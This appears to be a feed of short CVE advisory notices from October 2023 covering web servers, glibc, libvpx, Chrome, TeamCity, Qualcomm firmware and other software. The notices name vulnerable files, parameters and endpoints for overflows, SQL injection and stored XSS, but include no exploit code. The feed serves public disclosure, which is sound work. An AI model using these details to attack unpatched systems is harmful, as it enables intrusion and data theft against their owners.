🚨 CVE-2023-4491Buffer overflow vulnerability in Easy Address Book Web Server 1.6 version. The exploitation of this vulnerability could allow an attacker to send a very long username string to /searchbook.ghp, asking for the name via a POST request, resulting in arbitrary code execution on the remote machine.🎖@cveNotify |
|
| 2023-10-04 15:22:19 |
🚨 CVE-2023-4492Vulnerability in Easy Address Book Web Server 1.6 version, affecting the parameters (firstname, homephone, lastname, middlename, workaddress, workcity, workcountry, workphone, workstate and workzip) of the /addrbook.ghp file, allowing an attacker to inject a JavaScript payload specially designed to run when the application is loaded🎖@cveNotify |
|
| 2023-10-04 15:22:17 |
🚨 CVE-2023-4493Stored Cross-Site Scripting in Easy Address Book Web Server 1.6 version, through the users_admin.ghp file that affects multiple parameters such as (firstname, homephone, lastname, lastname, middlename, workaddress, workcity, workcountry, workphone, workstate, workzip). This vulnerability allows a remote attacker to store a malicious JavaScript payload in the application to be executed when the page is loaded, resulting in an integrity impact.🎖@cveNotify |
|
| 2023-10-04 15:22:16 |
🚨 CVE-2023-4494Stack-based buffer overflow vulnerability in Easy Chat Server 3.1 version. An attacker could send an excessively long username string to the register.ghp file asking for the name via a GET request resulting in arbitrary code execution on the remote machine.🎖@cveNotify |
|
| 2023-10-04 15:22:15 |
🚨 CVE-2023-4495Easy Chat Server, in its 3.1 version and before, does not sufficiently encrypt user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability stored via /registresult.htm (POST method), in the Resume parameter. The XSS is loaded from /register.ghp.🎖@cveNotify |
|
| 2023-10-04 15:22:14 |
🚨 CVE-2023-4496Easy Chat Server, in its 3.1 version and before, does not sufficiently encrypt user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability stored via /body2.ghp (POST method), in the mtowho parameter.🎖@cveNotify |
|
| 2023-10-04 15:22:12 |
🚨 CVE-2023-4497Easy Chat Server, in its 3.1 version and before, does not sufficiently encrypt user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability stored via /registresult.htm (POST method), in the Icon parameter. The XSS is loaded from /users.ghp.🎖@cveNotify |
|
| 2023-10-04 15:22:11 |
🚨 CVE-2023-5373A vulnerability classified as critical has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected is the function register of the file Master.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-241254 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-04 15:22:10 |
🚨 CVE-2023-44488VP9 in libvpx before 1.13.1 mishandles widths, leading to a crash related to encoding.🎖@cveNotify |
|
| 2023-10-04 15:22:08 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-04 15:22:07 |
🚨 CVE-2022-4132A flaw was found in JSS. A memory leak in JSS requires non-standard configuration but is a low-effort DoS vector if configured that way (repeatedly hitting the login page).🎖@cveNotify |
|
| 2023-10-04 15:22:05 |
🚨 CVE-2023-22618If Security Hardening guide rules are not followed, then Nokia WaveLite products allow a local user to create new users with administrative privileges by manipulating a web request. This affects (for example) WaveLite Metro 200 and Fan, WaveLite Metro 200 OPS and Fans, WaveLite Metro 200 and F2B fans, WaveLite Metro 200 OPS and F2B fans, WaveLite Metro 200 NE and F2B fans, and WaveLite Metro 200 NE OPS and F2B fans.🎖@cveNotify |
|
| 2023-10-04 15:22:04 |
🚨 CVE-2023-3037Improper authorization vulnerability in HelpDezk Community affecting version 1.1.10. This vulnerability could allow a remote attacker to access the platform without authentication and retrieve personal data via the jsonGrid parameter.🎖@cveNotify |
|
| 2023-10-04 15:22:03 |
🚨 CVE-2023-3038SQL injection vulnerability in HelpDezk Community affecting version 1.1.10. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the rows parameter of the jsonGrid route and extract all the information stored in the application.🎖@cveNotify |
|
| 2023-10-04 15:22:02 |
🚨 CVE-2023-3153A flaw was found in Open Virtual Network where the service monitor MAC does not properly rate limit. This issue could allow an attacker to cause a denial of service, including on deployments with CoPP enabled and properly configured.🎖@cveNotify |
|
| 2023-10-04 15:22:01 |
🚨 CVE-2023-3361A flaw was found in Red Hat OpenShift Data Science. When exporting a pipeline from the Elyra notebook pipeline editor as Python DSL or YAML, it reads S3 credentials from the cluster (ds pipeline server) and saves them in plain text in the generated output instead of an ID for a Kubernetes secret.🎖@cveNotify |
|
| 2023-10-04 15:21:59 |
🚨 CVE-2023-43261An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components.🎖@cveNotify |
|
| 2023-10-04 15:21:58 |
🚨 CVE-2023-44208Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40713.🎖@cveNotify |
|
| 2023-10-04 15:21:57 |
🚨 CVE-2023-4037Blind SQL injection vulnerability in the Conacwin 3.7.1.2 web interface, the exploitation of which could allow a local attacker to obtain sensitive data stored in the database by sending a specially crafted SQL query to the xml parameter.🎖@cveNotify |
|
| 2023-10-04 15:21:56 |
🚨 CVE-2023-4090Cross-site Scripting (XSS) reflected vulnerability on WideStand until 5.3.5 version, which generates one of the meta tags directly using the content of the queried URL, which would allow an attacker to inject HTML/Javascript code into the response.🎖@cveNotify |
|
| 2023-10-04 13:22:07 |
🚨 CVE-2023-3512Relative path traversal vulnerability in Setelsa Security's ConacWin CB, in its 3.8.2.2 version and earlier, the exploitation of which could allow an attacker to perform an arbitrary download of files from the system via the "Download file" parameter.🎖@cveNotify |
|
| 2023-10-04 13:22:06 |
🚨 CVE-2023-3701Aqua Drive, in its 2.4 version, is vulnerable to a relative path traversal vulnerability. By exploiting this vulnerability, an authenticated non privileged user could access/modify stored resources of other users. It could also be possible to access and modify the source and configuration files of the cloud disk platform, affecting the integrity and availability of the entire platform.🎖@cveNotify |
|
| 2023-10-04 13:22:05 |
🚨 CVE-2023-4586A vulnerability was found in the Hot Rod client. This security issue occurs as the Hot Rod client does not enable hostname validation when using TLS, possibly resulting in a man-in-the-middle (MITM) attack.🎖@cveNotify |
|
| 2023-10-04 13:22:03 |
🚨 CVE-2023-4997Improper authorisation of regular users in ProIntegra Uptime DC software (versions below 2.0.0.33940) allows them to change passwords of all other users including administrators leading to a privilege escalation.🎖@cveNotify |
|
| 2023-10-04 13:22:02 |
🚨 CVE-2023-5377Out-of-bounds Read in GitHub repository gpac/gpac prior to v2.2.2-DEV.🎖@cveNotify |
|
| 2023-10-04 13:22:01 |
🚨 CVE-2023-4911A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.🎖@cveNotify |
|
| 2023-10-04 13:22:00 |
🚨 CVE-2023-4806A flaw was found in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.🎖@cveNotify |
|
| 2023-10-04 13:21:59 |
🚨 CVE-2023-4527A flaw was found in glibc. When the getaddrinfo function is called with the AF_UNSPEC address family and the system is configured with no-aaaa mode via /etc/resolv.conf, a DNS response via TCP larger than 2048 bytes can potentially disclose stack contents through the function returned address data, and may cause a crash.🎖@cveNotify |
|
| 2023-10-04 13:21:57 |
🚨 CVE-2022-39046An issue was discovered in the GNU C Library (glibc) 2.36. When the syslog function is passed a crafted input string larger than 1024 bytes, it reads uninitialized memory from the heap and prints it to the target log file, potentially revealing a portion of the contents of the heap.🎖@cveNotify |
|
| 2023-10-04 00:52:07 |
🚨 CVE-2023-39646Improper neutralization of SQL parameter in Theme Volty CMS Category Chain Slider module for PrestaShop. In the module “Theme Volty CMS Category Chain Slide"(tvcmscategorychainslider) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-04 00:52:06 |
🚨 CVE-2023-39648Improper neutralization of SQL parameter in Theme Volty CMS Testimonial module for PrestaShop. In the module “Theme Volty CMS Testimonial” (tvcmstestimonial) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-04 00:52:05 |
🚨 CVE-2023-39649Improper neutralization of SQL parameter in Theme Volty CMS Category Slider module for PrestaShop. In the module “Theme Volty CMS Category Slider” (tvcmscategoryslider) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-04 00:52:04 |
🚨 CVE-2023-39651Improper neutralization of SQL parameter in Theme Volty CMS BrandList module for PrestaShop In the module “Theme Volty CMS BrandList” (tvcmsbrandlist) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-04 00:52:02 |
🚨 CVE-2023-39647Improper neutralization of SQL parameter in Theme Volty CMS Category Product module for PrestaShop. In the module “Theme Volty CMS Category Product” (tvcmscategoryproduct) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.🎖@cveNotify |
|
| 2023-10-04 00:52:01 |
🚨 CVE-2023-40830Tenda AC6 v15.03.05.19 is vulnerable to Buffer Overflow as the Index parameter does not verify the length.🎖@cveNotify |
|
| 2023-10-03 22:51:57 |
🚨 CVE-2023-5329A vulnerability classified as problematic was found in Field Logic DataCube4 up to 20231001. This vulnerability affects unknown code of the file /api/ of the component Web API. The manipulation leads to improper authentication. The exploit has been disclosed to the public and may be used. VDB-241030 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-03 16:52:41 |
🚨 CVE-2023-2348A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227591.🎖@cveNotify |
|
| 2023-10-03 16:52:40 |
🚨 CVE-2023-36658An issue was discovered in OPSWAT MetaDefender KIOSK 4.6.1.9996. It has an unquoted service path that can be abused locally.🎖@cveNotify |
|
| 2023-10-03 16:52:38 |
🚨 CVE-2023-39010BoofCV 0.42 was discovered to contain a code injection vulnerability via the component boofcv.io.calibration.CalibrationIO.load. This vulnerability is exploited by loading a crafted camera calibration file.🎖@cveNotify |
|
| 2023-10-03 16:52:36 |
🚨 CVE-2023-3446Issue summary: Checking excessively long DH keys or parameters may be very slow.Impact summary: Applications that use the functions DH_check(), DH_check_ex()or EVP_PKEY_param_check() to check a DH key or DH parameters may experience longdelays. Where the key or parameters that are being checked have been obtainedfrom an untrusted source this may lead to a Denial of Service.The function DH_check() performs various checks on DH parameters. One of thosechecks confirms that the modulus ('p' parameter) is not too large. Trying to usea very large modulus is slow and OpenSSL will not normally use a modulus whichis over 10,000 bits in length.However the DH_check() function checks numerous aspects of the key or parametersthat have been supplied. Some of those checks use the supplied modulus valueeven if it has already been found to be too large.An application that calls DH_check() and supplies a key or parameters obtainedfrom an untrusted source could be vulernable to a Denial of Service attack.The function DH_check() is itself called by a number of other OpenSSL functions.An application calling any of those other functions may similarly be affected.The other functions affected by this are DH_check_ex() andEVP_PKEY_param_check().Also vulnerable are the OpenSSL dhparam and pkeyparam command line applicationswhen using the '-check' option.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.🎖@cveNotify |
|
| 2023-10-03 16:52:35 |
🚨 CVE-2023-2344A vulnerability has been found in SourceCodester Service Provider Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=save_service of the component HTTP POST Request Handler. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227587.🎖@cveNotify |
|
| 2023-10-03 16:52:33 |
🚨 CVE-2023-2346A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/inquiries/view_inquiry.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227589 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-03 16:52:32 |
🚨 CVE-2014-8587SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors.🎖@cveNotify |
|
| 2023-10-03 16:52:31 |
🚨 CVE-2023-42793In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible🎖@cveNotify |
|
| 2023-10-03 16:52:29 |
🚨 CVE-2023-34468The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.The resolution validates the Database URL and rejects H2 JDBC locations.You are recommended to upgrade to version 1.22.0 or later which fixes this issue.🎖@cveNotify |
|
| 2023-10-03 16:52:27 |
🚨 CVE-2023-3644A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_inquiry. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. VDB-233890 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-03 16:52:26 |
🚨 CVE-2019-19377In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and unmounting can lead to a use-after-free in btrfs_queue_work in fs/btrfs/async-thread.c.🎖@cveNotify |
|
| 2023-10-03 16:52:24 |
🚨 CVE-2019-17075An issue was discovered in write_tpt_entry in drivers/infiniband/hw/cxgb4/mem.c in the Linux kernel through 5.3.2. The cxgb4 driver is directly calling dma_map_single (a DMA function) from a stack variable. This could allow an attacker to trigger a Denial of Service, exploitable if this driver is used on an architecture for which this stack/DMA interaction has security relevance.🎖@cveNotify |
|
| 2023-10-03 16:52:23 |
🚨 CVE-2018-15471An issue was discovered in xenvif_set_hash_mapping in drivers/net/xen-netback/hash.c in the Linux kernel through 4.18.1, as used in Xen through 4.11.x and other products. The Linux netback driver allows frontends to control mapping of requests to request queues. When processing a request to set or change this mapping, some input validation (e.g., for an integer overflow) was missing or flawed, leading to OOB access in hash handling. A malicious or buggy frontend may cause the (usually privileged) backend to make out of bounds memory accesses, potentially resulting in one or more of privilege escalation, Denial of Service (DoS), or information leaks.🎖@cveNotify |
|
| 2023-10-03 16:52:21 |
🚨 CVE-2010-1623Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.🎖@cveNotify |
|
| 2023-10-03 16:52:19 |
🚨 CVE-2019-19448In the Linux kernel 5.0.21 and 5.3.11, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in try_merge_free_space in fs/btrfs/free-space-cache.c because the pointer to a left data structure can be the same as the pointer to a right data structure.🎖@cveNotify |
|
| 2023-10-03 16:52:17 |
🚨 CVE-2018-1000026Linux Linux kernel version at least v4.8 onwards, probably well before contains a Insufficient input validation vulnerability in bnx2x network card driver that can result in DoS: Network card firmware assertion takes card off-line. This attack appear to be exploitable via An attacker on a must pass a very large, specially crafted packet to the bnx2x card. This can be done from an untrusted guest VM..🎖@cveNotify |
|
| 2023-10-03 16:52:16 |
🚨 CVE-2023-34257** DISPUTED ** An issue was discovered in BMC Patrol through 23.1.00. The agent's configuration can be remotely modified (and, by default, authentication is not required). Some configuration fields related to SNMP (e.g., masterAgentName or masterAgentStartLine) result in code execution when the agent is restarted. NOTE: the vendor's perspective is "These are not vulnerabilities for us as we have provided the option to implement the authentication."🎖@cveNotify |
|
| 2023-10-03 16:52:14 |
🚨 CVE-2021-1419A vulnerability in the SSH management feature of multiple Cisco Access Points (APs) platforms could allow a local, authenticated user to modify files on the affected device and possibly gain escalated privileges. The vulnerability is due to improper checking on file operations within the SSH management interface. A network administrator user could exploit this vulnerability by accessing an affected device through SSH management to make a configuration change. A successful exploit could allow the attacker to gain privileges equivalent to the root user.🎖@cveNotify |
|
| 2023-10-03 16:52:13 |
🚨 CVE-2017-8631A remote code execution vulnerability exists in Excel Services, Microsoft Excel 2007 Service Pack 3, Microsoft Excel 2010 Service Pack 2, Microsoft Excel 2013 Service Pack 1, Microsoft Excel 2013 RT Service Pack 1, Microsoft Excel 2016, Microsoft Office Web Apps 2013, Microsoft Office Compatibility Pack Service Pack 3, Microsoft Excel Web App 2013 Service Pack 1, Microsoft Excel Viewer 2007 Service Pack 3, and Office Online Server when they fail to properly handle objects in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8630, CVE-2017-8632, and CVE-2017-8744.🎖@cveNotify |
|
| 2023-10-03 16:52:12 |
🚨 CVE-2019-19447In the Linux kernel 5.0.21, mounting a crafted ext4 filesystem image, performing some operations, and unmounting can lead to a use-after-free in ext4_put_super in fs/ext4/super.c, related to dump_orphan_list in fs/ext4/super.c.🎖@cveNotify |
|
| 2023-10-03 14:52:19 |
🚨 CVE-2023-42508JFrog Artifactory prior to version 7.66.0 is vulnerable to specific endpoint abuse with a specially crafted payload, which can lead to unauthenticated users being able to send emails with manipulated email body.🎖@cveNotify |
|
| 2023-10-03 14:52:17 |
🚨 CVE-2023-5353Improper Access Control in GitHub repository salesagility/suitecrm prior to 7.14.1.🎖@cveNotify |
|
| 2023-10-03 14:52:16 |
🚨 CVE-2023-32669Authorization bypass vulnerability in BuddyBoss 2.2.9 version, the exploitation of which could allow an authenticated user to access and rename other users' albums. This vulnerability can be exploited by changing the album identification (id).🎖@cveNotify |
|
| 2023-10-03 14:52:15 |
🚨 CVE-2021-31506This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-13674.🎖@cveNotify |
|
| 2023-10-03 14:52:13 |
🚨 CVE-2023-20115A vulnerability in the SFTP server implementation for Cisco Nexus 3000 Series Switches and 9000 Series Switches in standalone NX-OS mode could allow an authenticated, remote attacker to download or overwrite files from the underlying operating system of an affected device. This vulnerability is due to a logic error when verifying the user role when an SFTP connection is opened to an affected device. An attacker could exploit this vulnerability by connecting and authenticating via SFTP as a valid, non-administrator user. A successful exploit could allow the attacker to read or overwrite files from the underlying operating system with the privileges of the authenticated user. There are workarounds that address this vulnerability.🎖@cveNotify |
|
| 2023-10-03 14:52:12 |
🚨 CVE-2020-13677Under some circumstances, the Drupal core JSON:API module does not properly restrict access to certain content, which may result in unintended access bypass. Sites that do not have the JSON:API module enabled are not affected.🎖@cveNotify |
|
| 2023-10-03 14:52:10 |
🚨 CVE-2021-31508This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13306.🎖@cveNotify |
|
| 2023-10-03 14:52:09 |
🚨 CVE-2021-31498This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-12744.🎖@cveNotify |
|
| 2023-10-03 14:52:07 |
🚨 CVE-2021-31513This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of BMP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13678.🎖@cveNotify |
|
| 2023-10-03 14:52:05 |
🚨 CVE-2021-31509This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13309.🎖@cveNotify |
|
| 2023-10-03 14:52:04 |
🚨 CVE-2021-31499This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12745.🎖@cveNotify |
|
| 2023-10-03 14:52:02 |
🚨 CVE-2021-31500This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12746.🎖@cveNotify |
|
| 2023-10-03 14:52:01 |
🚨 CVE-2021-31503This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.3.84 (package 16.6.3.134). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of IGS files. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12690.🎖@cveNotify |
|
| 2023-10-03 14:52:00 |
🚨 CVE-2021-31501This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-13310.🎖@cveNotify |
|
| 2023-10-03 14:51:59 |
🚨 CVE-2021-31504This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.3.84 (package 16.6.3.134). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12691.🎖@cveNotify |
|
| 2023-10-03 14:51:57 |
🚨 CVE-2021-31507This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12653.🎖@cveNotify |
|
| 2023-10-03 12:22:02 |
🚨 CVE-2023-5009An issue has been discovered in GitLab EE affecting all versions starting from 13.12 before 16.2.7, all versions starting from 16.3 before 16.3.4. It was possible for an attacker to run pipeline jobs as an arbitrary user via scheduled security scan policies. This was a bypass of [CVE-2023-3932](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3932) showing additional impact.🎖@cveNotify |
|
| 2023-10-03 11:22:20 |
🚨 CVE-2023-24844Memory Corruption in Core while invoking a call to Access Control core library with hardware protected address range.🎖@cveNotify |
|
| 2023-10-03 11:22:19 |
🚨 CVE-2023-24847Transient DOS in Modem while allocating DSM items.🎖@cveNotify |
|
| 2023-10-03 11:22:18 |
🚨 CVE-2023-24848Information Disclosure in Data Modem while performing a VoLTE call with an undefined RTCP FB line value.🎖@cveNotify |
|
| 2023-10-03 11:22:16 |
🚨 CVE-2023-24849Information Disclosure in data Modem while parsing an FMTP line in an SDP message.🎖@cveNotify |
|
| 2023-10-03 11:22:15 |
🚨 CVE-2023-24850Memory Corruption in HLOS while importing a cryptographic key into KeyMaster Trusted Application.🎖@cveNotify |
|
| 2023-10-03 11:22:14 |
🚨 CVE-2023-24853Memory Corruption in HLOS while registering for key provisioning notify.🎖@cveNotify |
|
| 2023-10-03 11:22:13 |
🚨 CVE-2023-24855Memory corruption in Modem while processing security related configuration before AS Security Exchange.🎖@cveNotify |
|
| 2023-10-03 11:22:11 |
🚨 CVE-2023-28539Memory corruption in WLAN Host when the firmware invokes multiple WMI Service Available command.🎖@cveNotify |
|
| 2023-10-03 11:22:10 |
🚨 CVE-2023-28540Cryptographic issue in Data Modem due to improper authentication during TLS handshake.🎖@cveNotify |
|
| 2023-10-03 11:22:09 |
🚨 CVE-2023-28571Information disclosure in WLAN HOST while processing the WLAN scan descriptor list during roaming scan.🎖@cveNotify |
|
| 2023-10-03 11:22:08 |
🚨 CVE-2023-33026Transient DOS in WLAN Firmware while parsing a NAN management frame.🎖@cveNotify |
|
| 2023-10-03 11:22:07 |
🚨 CVE-2023-33027Transient DOS in WLAN Firmware while parsing rsn ies.🎖@cveNotify |
|
| 2023-10-03 11:22:05 |
🚨 CVE-2023-33028Memory corruption in WLAN Firmware while doing a memory copy of pmk cache.🎖@cveNotify |
|
| 2023-10-03 11:22:04 |
🚨 CVE-2023-33029Memory corruption in DSP Service during a remote call from HLOS to DSP.🎖@cveNotify |
|
| 2023-10-03 11:22:03 |
🚨 CVE-2023-33034Memory corruption while parsing the ADSP response command.🎖@cveNotify |
|
| 2023-10-03 11:22:02 |
🚨 CVE-2023-33035Memory corruption while invoking callback function of AFE from ADSP.🎖@cveNotify |
|
| 2023-10-03 11:22:01 |
🚨 CVE-2023-33039Memory corruption in Automotive Display while destroying the image handle created using connected display driver.🎖@cveNotify |
|
| 2023-10-03 11:21:59 |
🚨 CVE-2023-40400This issue was addressed with improved checks. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. A remote user may cause an unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-10-03 11:21:58 |
🚨 CVE-2023-41066An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14. An app may be able to unexpectedly leak a user's credentials from secure text fields.🎖@cveNotify |
|
| 2023-10-02 19:21:59 |
🚨 CVE-2023-44125The vulnerability is the use of implicit PendingIntents without the PendingIntent.FLAG_IMMUTABLE set that leads to theft and/or (over-)write of arbitrary files with system privilege in the Personalized service ("com.lge.abba") app. The attacker's app, if it had access to app notifications, could intercept them and redirect them to its activity, before making it grant access permissions to content providers with the `android:grantUriPermissions="true"` flag.🎖@cveNotify |
|
| 2023-10-02 19:21:58 |
🚨 CVE-2023-44126The vulnerability is that the Call management ("com.android.server.telecom") app patched by LG sends a lot of LG-owned implicit broadcasts that disclose sensitive data to all third-party apps installed on the same device. Those intents include data such as call states, durations, called numbers, contacts info, etc.🎖@cveNotify |
|
| 2023-10-02 11:21:56 |
🚨 CVE-2023-42132FD Application Apr. 2022 Edition (Version 9.01) and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2023-10-02 05:24:38 |
🚨 CVE-2023-32827In camera middleware, there is a possible out of bounds write due to a missing input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07993539; Issue ID: ALPS07993539.🎖@cveNotify |
|
| 2023-10-02 05:24:36 |
🚨 CVE-2023-32828In vpu, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07767817; Issue ID: ALPS07767817.🎖@cveNotify |
|
| 2023-10-02 05:24:35 |
🚨 CVE-2023-32829In apusys, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07713478; Issue ID: ALPS07713478.🎖@cveNotify |
|
| 2023-10-02 05:24:34 |
🚨 CVE-2023-32830In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03802522; Issue ID: DTV03802522.🎖@cveNotify |
|
| 2023-10-02 05:24:32 |
🚨 CVE-2023-5186Use after free in Passwords in Google Chrome prior to 117.0.5938.132 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via crafted UI interaction. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-02 05:24:31 |
🚨 CVE-2023-5187Use after free in Extensions in Google Chrome prior to 117.0.5938.132 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
